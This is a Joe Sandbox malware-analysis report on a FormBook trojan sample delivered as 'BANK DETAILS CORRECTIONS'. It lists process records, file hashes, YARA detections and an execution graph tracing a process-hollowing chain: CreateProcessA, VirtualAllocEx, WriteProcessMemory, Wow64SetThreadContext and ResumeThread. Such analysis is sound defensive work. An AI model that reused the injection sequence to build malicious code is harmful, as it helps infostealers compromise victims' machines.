                                                                                  Imagebase:0x310000
                                                                                  File size:31'744 bytes
                                                                                  MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:25
                                                                                  Start time:14:45:57
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:27
                                                                                  Start time:14:46:10
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                  Imagebase:0x7ff613480000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:275
                                                                                    Total number of Limit Nodes:14
                                                                                    execution_graph 39092 12fd01c 39093 12fd034 39092->39093 39094 12fd08e 39093->39094 39097 53b2c08 39093->39097 39106 53b0ad4 39093->39106 39100 53b2c45 39097->39100 39098 53b2c79 39132 53b0bfc 39098->39132 39100->39098 39101 53b2c69 39100->39101 39115 53b2d91 39101->39115 39121 53b2e6c 39101->39121 39127 53b2da0 39101->39127 39102 53b2c77 39109 53b0adf 39106->39109 39107 53b2c79 39108 53b0bfc CallWindowProcW 39107->39108 39111 53b2c77 39108->39111 39109->39107 39110 53b2c69 39109->39110 39112 53b2e6c CallWindowProcW 39110->39112 39113 53b2d91 CallWindowProcW 39110->39113 39114 53b2da0 CallWindowProcW 39110->39114 39112->39111 39113->39111 39114->39111 39116 53b2d88 39115->39116 39118 53b2d9a 39115->39118 39116->39102 39117 53b2e40 39117->39102 39136 53b2e47 39118->39136 39140 53b2e58 39118->39140 39122 53b2e2a 39121->39122 39123 53b2e7a 39121->39123 39125 53b2e58 CallWindowProcW 39122->39125 39126 53b2e47 CallWindowProcW 39122->39126 39124 53b2e40 39124->39102 39125->39124 39126->39124 39128 53b2db4 39127->39128 39130 53b2e58 CallWindowProcW 39128->39130 39131 53b2e47 CallWindowProcW 39128->39131 39129 53b2e40 39129->39102 39130->39129 39131->39129 39133 53b0c07 39132->39133 39134 53b435a CallWindowProcW 39133->39134 39135 53b4309 39133->39135 39134->39135 39135->39102 39137 53b2e58 39136->39137 39138 53b2e69 39137->39138 39143 53b4292 39137->39143 39138->39117 39141 53b2e69 39140->39141 39142 53b4292 CallWindowProcW 39140->39142 39141->39117 39142->39141 39144 53b0bfc CallWindowProcW 39143->39144 39145 53b42aa 39144->39145 39145->39138 38879 76d83b9 38884 76daeb6 38879->38884 38902 76dae50 38879->38902 38919 76dae40 38879->38919 38880 76d83c8 38885 76dae44 38884->38885 38887 76daeb9 38884->38887 38886 76dae72 38885->38886 38936 76db32f 38885->38936 38941 76db351 38885->38941 38945 76db911 38885->38945 38950 76db67a 38885->38950 38955 76db4fb 38885->38955 38960 76db3df 38885->38960 38965 76db33d 38885->38965 38970 76db6e2 38885->38970 38978 76db983 38885->38978 38982 76dbaa6 38885->38982 38986 76db2c6 38885->38986 38990 76db524 38885->38990 38995 76db845 38885->38995 39000 76db38a 38885->39000 38886->38880 38887->38880 38903 76dae6a 38902->38903 38904 76db32f 2 API calls 38903->38904 38905 76db38a 2 API calls 38903->38905 38906 76db845 2 API calls 38903->38906 38907 76db524 2 API calls 38903->38907 38908 76db2c6 2 API calls 38903->38908 38909 76dbaa6 2 API calls 38903->38909 38910 76dae72 38903->38910 38911 76db983 2 API calls 38903->38911 38912 76db6e2 4 API calls 38903->38912 38913 76db33d 2 API calls 38903->38913 38914 76db3df 2 API calls 38903->38914 38915 76db4fb 2 API calls 38903->38915 38916 76db67a 2 API calls 38903->38916 38917 76db911 2 API calls 38903->38917 38918 76db351 2 API calls 38903->38918 38904->38910 38905->38910 38906->38910 38907->38910 38908->38910 38909->38910 38910->38880 38911->38910 38912->38910 38913->38910 38914->38910 38915->38910 38916->38910 38917->38910 38918->38910 38920 76dae50 38919->38920 38921 76dae72 38920->38921 38922 76db32f 2 API calls 38920->38922 38923 76db38a 2 API calls 38920->38923 38924 76db845 2 API calls 38920->38924 38925 76db524 2 API calls 38920->38925 38926 76db2c6 2 API calls 38920->38926 38927 76dbaa6 2 API calls 38920->38927 38928 76db983 2 API calls 38920->38928 38929 76db6e2 4 API calls 38920->38929 38930 76db33d 2 API calls 38920->38930 38931 76db3df 2 API calls 38920->38931 38932 76db4fb 2 API calls 38920->38932 38933 76db67a 2 API calls 38920->38933 38934 76db911 2 API calls 38920->38934 38935 76db351 2 API calls 38920->38935 38921->38880 38922->38921 38923->38921 38924->38921 38925->38921 38926->38921 38927->38921 38928->38921 38929->38921 38930->38921 38931->38921 38932->38921 38933->38921 38934->38921 38935->38921 38937 76db325 38936->38937 38938 76db337 38937->38938 39005 76d753b 38937->39005 39009 76d7540 38937->39009 38938->38886 39013 76d75f0 38941->39013 39017 76d75eb 38941->39017 38942 76db36b 38942->38886 38946 76db929 38945->38946 39021 76d7af8 38946->39021 39025 76d7b00 38946->39025 38947 76db96e 38947->38886 38951 76db680 38950->38951 39029 76d7bb9 38951->39029 39033 76d7bc0 38951->39033 38952 76db6b9 38956 76db51e 38955->38956 38958 76d7bb9 WriteProcessMemory 38956->38958 38959 76d7bc0 WriteProcessMemory 38956->38959 38957 76db74f 38957->38886 38958->38957 38959->38957 38961 76db325 38960->38961 38962 76db337 38961->38962 38963 76d753b ResumeThread 38961->38963 38964 76d7540 ResumeThread 38961->38964 38962->38886 38963->38961 38964->38961 38966 76db34a 38965->38966 38968 76d7bb9 WriteProcessMemory 38966->38968 38969 76d7bc0 WriteProcessMemory 38966->38969 38967 76db6b9 38968->38967 38969->38967 39037 76d7ca9 38970->39037 39041 76d7cb0 38970->39041 38971 76dbb9c 38971->38886 38972 76db704 38972->38971 38974 76d7af8 VirtualAllocEx 38972->38974 38975 76d7b00 VirtualAllocEx 38972->38975 38973 76db96e 38973->38886 38974->38973 38975->38973 38980 76d7bb9 WriteProcessMemory 38978->38980 38981 76d7bc0 WriteProcessMemory 38978->38981 38979 76db9a7 38980->38979 38981->38979 38984 76d75eb Wow64SetThreadContext 38982->38984 38985 76d75f0 Wow64SetThreadContext 38982->38985 38983 76dbac0 38984->38983 38985->38983 39045 76d7e3d 38986->39045 39049 76d7e48 38986->39049 38991 76db325 38990->38991 38992 76db337 38991->38992 38993 76d753b ResumeThread 38991->38993 38994 76d7540 ResumeThread 38991->38994 38992->38886 38993->38991 38994->38991 38996 76db852 38995->38996 38998 76d7af8 VirtualAllocEx 38996->38998 38999 76d7b00 VirtualAllocEx 38996->38999 38997 76db96e 38997->38886 38998->38997 38999->38997 39001 76db325 39000->39001 39002 76db337 39001->39002 39003 76d753b ResumeThread 39001->39003 39004 76d7540 ResumeThread 39001->39004 39002->38886 39003->39001 39004->39001 39006 76d7580 ResumeThread 39005->39006 39008 76d75b1 39006->39008 39008->38937 39010 76d7580 ResumeThread 39009->39010 39012 76d75b1 39010->39012 39012->38937 39014 76d7635 Wow64SetThreadContext 39013->39014 39016 76d767d 39014->39016 39016->38942 39018 76d7635 Wow64SetThreadContext 39017->39018 39020 76d767d 39018->39020 39020->38942 39022 76d7b00 VirtualAllocEx 39021->39022 39024 76d7b7d 39022->39024 39024->38947 39026 76d7b40 VirtualAllocEx 39025->39026 39028 76d7b7d 39026->39028 39028->38947 39030 76d7bc0 WriteProcessMemory 39029->39030 39032 76d7c5f 39030->39032 39032->38952 39034 76d7c08 WriteProcessMemory 39033->39034 39036 76d7c5f 39034->39036 39036->38952 39038 76d7cb0 ReadProcessMemory 39037->39038 39040 76d7d3f 39038->39040 39040->38972 39042 76d7cfb ReadProcessMemory 39041->39042 39044 76d7d3f 39042->39044 39044->38972 39046 76d7e48 CreateProcessA 39045->39046 39048 76d8093 39046->39048 39050 76d7ed1 CreateProcessA 39049->39050 39052 76d8093 39050->39052 38797 135fbf8 38800 1355c9c 38797->38800 38799 135fc26 38801 1355ca7 38800->38801 38803 1358693 38801->38803 38807 135ad42 38801->38807 38802 13586d1 38802->38799 38803->38802 38811 135ce30 38803->38811 38816 135ce20 38803->38816 38821 135ad78 38807->38821 38824 135ad68 38807->38824 38808 135ad56 38808->38803 38812 135ce51 38811->38812 38813 135ce75 38812->38813 38848 135cfd1 38812->38848 38852 135cfe0 38812->38852 38813->38802 38818 135ce30 38816->38818 38817 135ce75 38817->38802 38818->38817 38819 135cfd1 2 API calls 38818->38819 38820 135cfe0 2 API calls 38818->38820 38819->38817 38820->38817 38828 135ae70 38821->38828 38822 135ad87 38822->38808 38825 135ad78 38824->38825 38827 135ae70 2 API calls 38825->38827 38826 135ad87 38826->38808 38827->38826 38829 135ae81 38828->38829 38830 135aea4 38828->38830 38829->38830 38836 135b108 38829->38836 38840 135b0f8 38829->38840 38830->38822 38831 135ae9c 38831->38830 38832 135b0a8 GetModuleHandleW 38831->38832 38833 135b0d5 38832->38833 38833->38822 38837 135b11c 38836->38837 38839 135b141 38837->38839 38844 135a8b0 38837->38844 38839->38831 38841 135b108 38840->38841 38842 135b141 38841->38842 38843 135a8b0 LoadLibraryExW 38841->38843 38842->38831 38843->38842 38845 135b2e8 LoadLibraryExW 38844->38845 38847 135b361 38845->38847 38847->38839 38849 135cfe0 38848->38849 38850 135d027 38849->38850 38856 135c918 38849->38856 38850->38813 38853 135cfed 38852->38853 38854 135d027 38853->38854 38855 135c918 2 API calls 38853->38855 38854->38813 38855->38854 38857 135c923 38856->38857 38859 135d938 38857->38859 38860 135ca44 38857->38860 38859->38859 38861 135ca4f 38860->38861 38862 1355c9c 2 API calls 38861->38862 38863 135d9a7 38862->38863 38863->38859 38864 135d0f8 38865 135d13e 38864->38865 38869 135d2d8 38865->38869 38872 135d2c8 38865->38872 38866 135d22b 38876 135c9e0 38869->38876 38873 135d2d8 38872->38873 38874 135c9e0 DuplicateHandle 38873->38874 38875 135d306 38874->38875 38875->38866 38877 135d340 DuplicateHandle 38876->38877 38878 135d306 38877->38878 38878->38866 39053 1354668 39054 135467a 39053->39054 39055 1354686 39054->39055 39059 1354778 39054->39059 39064 1353e1c 39055->39064 39057 13546a5 39060 135479d 39059->39060 39068 1354878 39060->39068 39072 1354888 39060->39072 39065 1353e27 39064->39065 39080 1355c1c 39065->39080 39067 135702b 39067->39057 39070 1354888 39068->39070 39069 135498c 39069->39069 39070->39069 39076 135449c 39070->39076 39073 13548af 39072->39073 39074 135449c CreateActCtxA 39073->39074 39075 135498c 39073->39075 39074->39075 39077 1355918 CreateActCtxA 39076->39077 39079 13559db 39077->39079 39081 1355c27 39080->39081 39084 1355c3c 39081->39084 39083 13570d5 39083->39067 39085 1355c47 39084->39085 39088 1355c6c 39085->39088 39087 13571ba 39087->39083 39089 1355c77 39088->39089 39090 1355c9c 2 API calls 39089->39090 39091 13572ad 39090->39091 39091->39087 39146 76dc450 39147 76dc5db 39146->39147 39149 76dc476 39146->39149 39149->39147 39150 76dc040 39149->39150 39151 76dc6d0 PostMessageW 39150->39151 39152 76dc73c 39151->39152 39152->39149

                                                                                    Executed Functions

                                                                                    Function 053B8568 Relevance: 3.4, Strings: 1, Instructions: 2184COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 53b8568-53b8593 1 53b859a-53b8d16 call 53b8154 call 53b8164 call 53b8174 * 2 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8184 * 4 call 53b8194 call 53b81a4 call 53b81b4 call 53b81c4 0->1 2 53b8595 0->2 127 53b8e62-53b8e73 1->127 2->1 128 53b8e7b-53b8e7d 127->128 129 53b8e75 127->129 132 53b8e84-53b8e93 128->132 130 53b8e7f 129->130 131 53b8e77-53b8e79 129->131 130->132 131->128 131->130 133 53b8d1b-53b8d3f 132->133 134 53b8e99-53b90bd call 53b81d4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 132->134 138 53b8d4c-53b8d4f 133->138 139 53b8d41-53b8d43 133->139 191 53b90bf 134->191 192 53b90c4-53b90f8 134->192 141 53b8d51 138->141 142 53b8d56-53b8d5f 138->142 143 53b8d4a 139->143 144 53b8d45 139->144 141->142 145 53b8d61 142->145 146 53b8d66-53b8d8c 142->146 143->142 144->143 145->146 154 53b8d99-53b8d9c 146->154 155 53b8d8e-53b8d90 146->155 156 53b8d9e 154->156 157 53b8da3-53b8dac 154->157 158 53b8d92 155->158 159 53b8d97 155->159 156->157 160 53b8dae 157->160 161 53b8db3-53b8e02 157->161 158->159 159->157 160->161 168 53b8e0f-53b8e12 161->168 169 53b8e04-53b8e06 161->169 170 53b8e19-53b8e39 168->170 171 53b8e14 168->171 173 53b8e08 169->173 174 53b8e0d 169->174 178 53b8e3b 170->178 179 53b8e40-53b8e5f 170->179 171->170 173->174 174->170 178->179 179->127 191->192 194 53b90fa 192->194 195 53b90ff-53b911f 192->195 194->195 197 53b9121 195->197 198 53b9126-53b915e 195->198 197->198 201 53b9166-53baa60 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8234 call 53b8244 call 53b8254 call 53b8264 * 17 call 53b81b4 call 53b8274 198->201
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $2q
                                                                                    • API String ID: 0-3731487377
                                                                                    • Opcode ID: 8d8d8b2c6c551a4ef43cd587318ed02df102782182797f1c8bb48ba4375e6918
                                                                                    • Instruction ID: c8b1173ba7950ea7beadb1370f6aca1c02d81cebc1def98b3fd1f9a9d221c888
                                                                                    • Opcode Fuzzy Hash: 8d8d8b2c6c551a4ef43cd587318ed02df102782182797f1c8bb48ba4375e6918
                                                                                    • Instruction Fuzzy Hash: 2C33C534A41219CFDB64EF28C898BD9B7B5BF89300F5086E9D5096B361DB71AE85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B855A Relevance: 3.3, Strings: 1, Instructions: 2079COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 516 53b855a-53b8593 519 53b859a-53b85ff 516->519 520 53b8595 516->520 525 53b8609-53b8615 call 53b8154 519->525 520->519 527 53b861a-53b8964 call 53b8164 call 53b8174 * 2 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8174 call 53b8164 call 53b8184 * 4 525->527 594 53b896f-53b8983 call 53b8194 527->594 596 53b8988-53b8d16 call 53b81a4 call 53b81b4 call 53b81c4 594->596 645 53b8e62-53b8e73 596->645 646 53b8e7b-53b8e7d 645->646 647 53b8e75 645->647 650 53b8e84-53b8e93 646->650 648 53b8e7f 647->648 649 53b8e77-53b8e79 647->649 648->650 649->646 649->648 651 53b8d1b-53b8d3f 650->651 652 53b8e99-53b8ee4 call 53b81d4 650->652 656 53b8d4c-53b8d4f 651->656 657 53b8d41-53b8d43 651->657 665 53b8eee-53b8f05 call 53b81e4 652->665 659 53b8d51 656->659 660 53b8d56-53b8d5f 656->660 661 53b8d4a 657->661 662 53b8d45 657->662 659->660 663 53b8d61 660->663 664 53b8d66-53b8d8c 660->664 661->660 662->661 663->664 672 53b8d99-53b8d9c 664->672 673 53b8d8e-53b8d90 664->673 668 53b8f0a-53b8f7e call 53b81f4 call 53b8204 665->668 685 53b8f83-53b8f91 668->685 674 53b8d9e 672->674 675 53b8da3-53b8dac 672->675 676 53b8d92 673->676 677 53b8d97 673->677 674->675 678 53b8dae 675->678 679 53b8db3-53b8e02 675->679 676->677 677->675 678->679 686 53b8e0f-53b8e12 679->686 687 53b8e04-53b8e06 679->687 690 53b8f97-53b9082 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 685->690 688 53b8e19-53b8e39 686->688 689 53b8e14 686->689 691 53b8e08 687->691 692 53b8e0d 687->692 696 53b8e3b 688->696 697 53b8e40-53b8e5f 688->697 689->688 706 53b9087-53b90a7 690->706 691->692 692->688 696->697 697->645 708 53b90ad-53b90bd 706->708 709 53b90bf 708->709 710 53b90c4-53b90f8 708->710 709->710 712 53b90fa 710->712 713 53b90ff-53b911f 710->713 712->713 715 53b9121 713->715 716 53b9126-53b9145 713->716 715->716 718 53b914f-53b915e 716->718 719 53b9166-53baa60 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8204 call 53b81a4 call 53b81b4 call 53b81e4 call 53b81f4 call 53b8214 call 53b8224 call 53b8234 call 53b8244 call 53b8254 call 53b8264 * 17 call 53b81b4 call 53b8274 718->719
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $2q
                                                                                    • API String ID: 0-3731487377
                                                                                    • Opcode ID: 6907ce5ddc0ab3bfe5aa0050cdc14a875ff8b41421d7e5f58195d9dbe86c2b82
                                                                                    • Instruction ID: 1d25e7eb0f0f6764982a8257fa880e24346dbabe1a42f32b3a78ef9dfa83cc30
                                                                                    • Opcode Fuzzy Hash: 6907ce5ddc0ab3bfe5aa0050cdc14a875ff8b41421d7e5f58195d9dbe86c2b82
                                                                                    • Instruction Fuzzy Hash: F023C534A41219CFDBA4EF24C898BD9B7B5BF89300F5086E9D5096B361DB71AE85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B8154 Relevance: .6, Instructions: 592COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 309d4fd111d640afbef2d8b7d2504be4028d2b0ea8eeb9a06eb4d66600d4b45b
                                                                                    • Instruction ID: e06d6620e89d9cbf23618da4fe58031588c45201274ff0d694f66a5964ad4e66
                                                                                    • Opcode Fuzzy Hash: 309d4fd111d640afbef2d8b7d2504be4028d2b0ea8eeb9a06eb4d66600d4b45b
                                                                                    • Instruction Fuzzy Hash: A8524034A007498FDB14DF28C844BD9B7B2BF89314F2582A9D5586F3A1DBB1AD86CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053BB2C0 Relevance: .6, Instructions: 584COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 134890cdb6794b94e18b02c8a74238da655566d820c7ccd6543b3a465b1b378e
                                                                                    • Instruction ID: 43d41d421fe15e9309784cfa93f3b3fd3d58d769eccba2e7c0264487707055de
                                                                                    • Opcode Fuzzy Hash: 134890cdb6794b94e18b02c8a74238da655566d820c7ccd6543b3a465b1b378e
                                                                                    • Instruction Fuzzy Hash: B9524034A00749CFDB14DF28C844BD9B7B2BF85314F2582A9D5586F3A1DBB1A986CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D2129 Relevance: .1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c7c5a417c189d46f803a38ab3ea8a109fdb7879979d16cdf7627ae8bd50cc77c
                                                                                    • Instruction ID: 0d170b97a867f68d01f50fb6f619d45f894afe11744e6c0652f08128866cf29c
                                                                                    • Opcode Fuzzy Hash: c7c5a417c189d46f803a38ab3ea8a109fdb7879979d16cdf7627ae8bd50cc77c
                                                                                    • Instruction Fuzzy Hash: F5419FB1D286199FEB15CF96DC506EEBBFABF8A300F04C066D50AA7251E7342945CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076DB423 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 519fda8b01cad0b3fbac2b105fb67e9b8aa337243d60518333fb1167728e4b07
                                                                                    • Instruction ID: 720fc934f1169b44c3426ea496cbb29297647fa69e36007169837abc38b3eef0
                                                                                    • Opcode Fuzzy Hash: 519fda8b01cad0b3fbac2b105fb67e9b8aa337243d60518333fb1167728e4b07
                                                                                    • Instruction Fuzzy Hash: D0C09BD5DFE004D1C5001D8560100FCE73CD38F162E023055821F67205C5505D66864D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7E3D Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1336 76d7e3d-76d7edd 1339 76d7edf-76d7ee9 1336->1339 1340 76d7f16-76d7f36 1336->1340 1339->1340 1341 76d7eeb-76d7eed 1339->1341 1345 76d7f6f-76d7f9e 1340->1345 1346 76d7f38-76d7f42 1340->1346 1343 76d7eef-76d7ef9 1341->1343 1344 76d7f10-76d7f13 1341->1344 1347 76d7efd-76d7f0c 1343->1347 1348 76d7efb 1343->1348 1344->1340 1356 76d7fd7-76d8091 CreateProcessA 1345->1356 1357 76d7fa0-76d7faa 1345->1357 1346->1345 1349 76d7f44-76d7f46 1346->1349 1347->1347 1350 76d7f0e 1347->1350 1348->1347 1351 76d7f69-76d7f6c 1349->1351 1352 76d7f48-76d7f52 1349->1352 1350->1344 1351->1345 1354 76d7f54 1352->1354 1355 76d7f56-76d7f65 1352->1355 1354->1355 1355->1355 1358 76d7f67 1355->1358 1368 76d809a-76d8120 1356->1368 1369 76d8093-76d8099 1356->1369 1357->1356 1359 76d7fac-76d7fae 1357->1359 1358->1351 1361 76d7fd1-76d7fd4 1359->1361 1362 76d7fb0-76d7fba 1359->1362 1361->1356 1363 76d7fbc 1362->1363 1364 76d7fbe-76d7fcd 1362->1364 1363->1364 1364->1364 1365 76d7fcf 1364->1365 1365->1361 1379 76d8130-76d8134 1368->1379 1380 76d8122-76d8126 1368->1380 1369->1368 1382 76d8144-76d8148 1379->1382 1383 76d8136-76d813a 1379->1383 1380->1379 1381 76d8128 1380->1381 1381->1379 1385 76d8158-76d815c 1382->1385 1386 76d814a-76d814e 1382->1386 1383->1382 1384 76d813c 1383->1384 1384->1382 1387 76d816e-76d8175 1385->1387 1388 76d815e-76d8164 1385->1388 1386->1385 1389 76d8150 1386->1389 1390 76d818c 1387->1390 1391 76d8177-76d8186 1387->1391 1388->1387 1389->1385 1393 76d818d 1390->1393 1391->1390 1393->1393
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076D807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: f5483215d20586bb27c708bf7779373699515390441de5b6c2ee2b71ecd069b6
                                                                                    • Instruction ID: cc75e980e714dcc2aae451bf0806a580111c324b1a5bb2732ec295ebcfb09bdf
                                                                                    • Opcode Fuzzy Hash: f5483215d20586bb27c708bf7779373699515390441de5b6c2ee2b71ecd069b6
                                                                                    • Instruction Fuzzy Hash: 2DA14DB1D1021ADFEB24CF69C841BEDBBB2BF48314F1485A9E819A7240D7749D85CF92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7E48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

